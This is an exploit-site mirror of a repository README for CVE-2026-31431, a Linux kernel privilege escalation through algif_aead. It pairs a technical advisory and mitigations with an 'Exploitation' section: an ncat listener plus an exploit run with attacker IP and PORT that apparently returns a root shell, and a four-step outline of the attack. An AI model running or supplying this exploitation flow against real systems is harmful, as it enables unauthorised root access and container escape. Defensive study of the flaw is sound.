Share
## https://sploitus.com/exploit?id=6780F1E2-8E5F-57C6-9A3A-FFCEBCC0A591
# ๐Ÿ”ด CVE-2026-31431 โ€” "Copy Fail"

### A 9-Year-Old Linux Kernel Logic Bug That Grants Root in Seconds

[![CVE](https://img.shields.io/badge/CVE-2026--31431-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2026-31431)
[![CVSS](https://img.shields.io/badge/CVSS-7.8%20HIGH-orange?style=for-the-badge)](#)
[![Kernel](https://img.shields.io/badge/Linux%20Kernel-4.14%E2%80%937.0--rc-blue?style=for-the-badge)](#affected-versions)
[![Since](https://img.shields.io/badge/Introduced-August%202017-yellow?style=for-the-badge)](#timeline)

---

## Overview

**Copy Fail** is a high-severity local privilege escalation (LPE) vulnerability in the Linux kernel's cryptographic subsystem (`algif_aead`). Discovered and disclosed by **Theori** (via their **Xint Code** AI-assisted vulnerability research tool) on **April 29, 2026**, the flaw allows any unprivileged local user to write 4 controlled bytes into the page cache of any readable file โ€” and leverage that to obtain **root** on virtually every major Linux distribution shipped since 2017.

A working proof-of-concept exploit is only **~732 bytes of Python**.

---

## Exploitation

1. Start Ncat Listener
```
sudo ncat -lvnp 445
```
2. Execute the exploit on target machine
```
# Using Python script
python3 CVE-2026-31431-Exploit.py IP PORT

# Compiled binary
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
```

---

## ๐Ÿงฌ Technical Summary

| Field | Detail |
|---|---|
| **CVE ID** | CVE-2026-31431 |
| **CVSS Score** | 7.8 (HIGH) |
| **Type** | Local Privilege Escalation (LPE) |
| **Component** | `algif_aead` โ€” Linux kernel AF_ALG userspace crypto interface |
| **Root Cause** | Logic flaw in the `authencesn` AEAD template; an in-place optimization (commit `72548b093ee3`, Aug 2017) causes page-cache pages to appear in the kernel's writable destination scatterlist |
| **Primitive** | 4-byte controlled write into the page cache of any readable file |
| **Exploit Mechanism** | AF_ALG socket โ†’ `splice()` โ†’ page-cache corruption of a setuid binary โ†’ root |
| **Race Condition?** | โŒ None โ€” straight-line logic flaw, 100% reliable |
| **Kernel Offset Needed?** | โŒ No |
| **Fix Commit** | `fafe0fa2995a` (reverts the 2017 optimization) |

### How the Exploit Works (4 Steps)

1. **Open** an `AF_ALG` socket and bind to `authencesn(hmac(sha256),cbc(aes))`
2. **Splice** a readable setuid binary's pages into the socket
3. The kernel's AEAD scratch write overwrites **4 bytes** in the page cache of that binary
4. **Execute** the now-corrupted setuid binary โ†’ **root shell**

### Why It's Dangerous

- **No race window** โ€” deterministic, works every time
- **No kernel offset / KASLR bypass needed**
- **Same exploit works across distros** โ€” Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, etc.
- **Container escape** โ€” the page cache is shared; a write from inside a container affects the host
- **No disk modification** โ€” file-integrity monitors (AIDE, OSSEC, etc.) won't detect it
- **No forensic trace on disk**

---

## ๐ŸŽฏ Affected Versions

| Affected | Not Affected |
|---|---|
| Linux kernel **4.14** through **7.0-rc** | Kernels prior to 4.14 (before Aug 2017 commit) |
| All **6.18.x** prior to **6.18.22** | **6.18.22+** (patched) |
| All **6.19.x** prior to **6.19.12** | **6.19.12+** (patched) |

### Confirmed Vulnerable Distributions

- Ubuntu 24.04 LTS
- Amazon Linux 2023
- RHEL 10.1
- SUSE 16
- Rocky Linux 9.7

> Essentially **every major Linux distribution released since 2017** is affected.

---

## ๐Ÿ›ก๏ธ Mitigation

### 1. Patch (Recommended)

Update your kernel to a version containing fix commit `fafe0fa2995a`. Most major distributions have released or are releasing updated kernel packages.

### 2. Temporary Workarounds

If you cannot patch immediately:

- **Block AF_ALG socket creation** via seccomp policy
- **Blacklist the `algif_aead` module:**
  ```bash
  echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
  sudo modprobe -r algif_aead 2>/dev/null
  ```


## โš ๏ธ Disclaimer

This repository is for **educational and defensive purposes only**. The information here is intended to help security teams understand, detect, and mitigate CVE-2026-31431. Always follow responsible disclosure practices and applicable laws.

---

### โญ Star this repo to stay updated on patches and detection guidance.